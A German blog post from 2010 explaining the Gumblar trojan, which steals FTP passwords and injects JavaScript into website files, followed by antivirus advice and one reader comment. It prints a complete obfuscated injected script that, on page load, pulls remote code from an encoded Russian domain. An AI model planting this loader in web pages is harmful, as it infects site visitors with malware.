Der Gumbar Virus und sein schadhafter Javascript Code Do, Mär 25. 2010

In den letzten Tagen ging ein kleiner Aufschrei durch das Internet: Der Gumblar Virus hat zugeschlagen!
Im Folgenden wird beschrieben was die Auswirkungen des Gumblar Virus sind und wie man sich dagegen schützen kann.

Was ist der Gumblar Virus?

Der Gumblar Virus ist ein Trojaner der sich auf PCs einnistet und dort FTP Passwörter klaut. Diese benutzt er dann, um schadhaften Code auf Internetseiten zu verbreiten. Die Passwörter holt er sich z.B. von Filezilla, Total Commander oder Adobe Dreamweaver, die keine oder nur mangelhafte Verschlüsselung der FTP Passwörter bieten.

Welche Auswirkungen hat der Virus?

Der Virus geht mit den geklauten Passwörtern über einen FTP Client auf Internetserver und stellt schadhaften Javascriptcode ans Ende von allen Dateien die mit "index", "main", "default" anfangen oder die Endung ".js" haben.

Der Code sieht beispielsweise so aus:
var V;if(V!=''){V='t'};var Rd=new String();function H(){var h;if(h!='OE' && h != ''){h=null};var K=String("g");var T;if(T!='' && T!='_'){T=null};var y=new Date();var j="\x68\x74\x74\x70\x3a\x2f\x2f\x79\x38\x2d\x63\x6f\x6d\x2e\x67\x6f\x6f\x67\x6c\x65\x2e\x63\x6f\x6d\x2e\x6d\x79\x2e\x6d\x70\x6e\x72\x73\x2d\x63\x6f\x6d\x2e\x54\x68\x65\x42\x6c\x65\x6e\x64\x65\x72\x52\x65\x70\x6c\x61\x63\x65\x6d\x65\x6e\x74\x2e\x72\x75\x3a";var z;if(z!='' && z!='QX'){z='I'};var g;if(g!='' && g!='Kn'){g='sy'};var b=unescape;var u='';this.v='';var kX;if(kX!='zT' && kX!='U'){kX='zT'};var s=window;this.E="";var Qq;if(Qq!='e' && Qq!='Y'){Qq='e'};function k(A,Q){var Wf;if(Wf!='W' && Wf!='QG'){Wf=''};var SL=new Date();var d=b("%5b")+Q+b("%5d");var IT;if(IT!='Jv'){IT='Jv'};var Z=new RegExp(d, K);var kt;if(kt!='sm' && kt!='TS'){kt='sm'};var Gi=new String();return A.replace(Z, u);var C;if(C!=''){C='is'};var Di;if(Di!=''){Di='SLj'};};var rw=new Array();var sk=new Array();var Jz;if(Jz!='' && Jz!='QT'){Jz='So'};var mt;if(mt!='' && mt!='L'){mt='HJ'};var R=document;var O='';var jV=b("%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%7a%65%64%67%65%2e%6e%65%74%2f%67%6f%6f%2e%6e%65%2e%6a%70%2f%6e%79%64%61%69%6c%79%6e%65%77%73%2e%63%6f%6d%2e%70%68%70");var Kq;if(Kq!='MN' && Kq!='UI'){Kq=''};var WV;if(WV!='OG' && WV != ''){WV=null};var D=k('8274506915865346016653','75324961');this.Ha="";var wt='';var Ez;if(Ez!='' && Ez!='FN'){Ez=null};function S(){O=j;var og='';O+=D;O+=jV;var UX=new Date();var _p;if(_p!='' && _p!='VK'){_p='Gg'};try {var rr;if(rr!='Xr' && rr != ''){rr=null};var UL=new Date();var yd=new String();i=R.createElement(k('sIcCrCiIpPte','JPCBKey84d7wI'));this.qd="";var Jq;if(Jq!='' && Jq!='SC'){Jq='kw'};i.defer=[1][0];i.src=O;var iw="";var yW='';R.body.appendChild(i);var tb="";} catch(DR){var Nk;if(Nk!='vNH' && Nk != ''){Nk=null};this.Lx="";};var ZC;if(ZC!='ib' && ZC!='vn'){ZC='ib'};var kT='';}s[new String("onloa"+"dkti2".substr(0,1))]=S;var yZ=new Date();var uJ;if(uJ!=''){uJ='jL'};var zZn='';var DA=new Array();};var Xp="";var FW;if(FW!='lu' && FW!='Ym'){FW='lu'};var n='';var fm="";H();this.fb='';

Nur für den Profi ist dabei zu erkennen, was das Script macht.

Was macht der schadhafte Javascript Code?

Wenn ein Benutzer auf eine Internetseite gelangt, die mit dem schadhaften Javascript Code infiziert wurde wird eine russische Internetseite Aufgerufen, die einen Trojaner bzw.ein Virus herunter lädt. Sollte man in dem Fall keine Firewall oder einen Virenscanner haben, wird man sehr wahrscheinlich nichts von der Infektion mitbekommen und schon ist der eigene PC infiziert.

Wie finde ich heraus ob mein PC auch infiziert ist?

Eine Internet Security, ein Virenscanner oder eine Firewall mit jeweils aktueller Version und Virenupdates werden die Infektion finden. Wer kein Geld für die kostenpflichtigen Versionen ausgeben will, kann z.B. eine 30-Tage kostenfreie Version der bekannten Anbieter testen oder greift auf eine komplett freie Software zurück, wie z.B. die von AVG [1].
Es gibt auch einige online Virenscanner (z.B. von Trendmicro [2]) die schnell und zuverlässig den Rechner nach Viren und Trojanern durchsuchen.

Zudem sollte man sich generell vor Javascript Code im Internet schützen. Eine gutes Firefox-Addon ist das "No-Script" [3]. Hierbei werden generell alle Scripte geblockt, es sei denn, man vertraut der Internetseite und gibt die Scripte zur Ausführung frei.

[1] http://free.avg.com/de-de/startseite

[2] http://housecall.trendmicro.com/de/

[3] https://addons.mozilla.org/de/firefox/addon/722

Bookmarks:

Delicious Facebook Google Yahoo Mr. Wong Linkarena Digg

Geschrieben von Markus in 1001 Probleme Kommentar: (1) Trackbacks: (0)

< HowTo: Installation der Gallery3 | Magento Installation: open_basedir restriction in effect >

Trackbacks

Trackback-URL für diesen Eintrag

Keine Trackbacks

Kommentare

Ansicht der Kommentare: (Linear | Verschachtelt)

#1 - Werner schrieb:
28.05.2010 10:00 -

Hi, vielen Dank für diesen Beitrag! Bin zwar nur durch Zufall darauf gestoßen, habe aber genau dieses Problem bei einigen meiner Kundenprojekte und habe den Fehler den jeweiligen Hostern zugeschanzt - derweil war ich das Kamel. Kaspersky (kostenpflichtige Internetsecurity) hatte mir leider nicht angeschlagen, weswegen mir das zuerst gar nicht aufgefallen ist - erst durch einen Kunden und dann durch diesen Beitrag bin ich wieder eine Ecke schlauer geworden. Vielen Dank an Gurkcity!!

Kommentar schreiben

Name
E-Mail
Homepage
Antwort zu
Kommentar	Die angegebene E-Mail-Adresse wird nicht dargestellt, sondern nur für eventuelle Benachrichtigungen verwendet. Um maschinelle und automatische Übertragung von Spamkommentaren zu verhindern, bitte die Zeichenfolge im dargestellten Bild in der Eingabemaske eintragen. Nur wenn die Zeichenfolge richtig eingegeben wurde, kann der Kommentar angenommen werden. Bitte beachten Sie, dass Ihr Browser Cookies unterstützen muss, um dieses Verfahren anzuwenden. Hier die Zeichenfolge der Spamschutz-Grafik eintragen:
	Daten merken? Bei Aktualisierung dieser Kommentare benachrichtigen
Kommentare werden erst nach redaktioneller Prüfung freigeschaltet!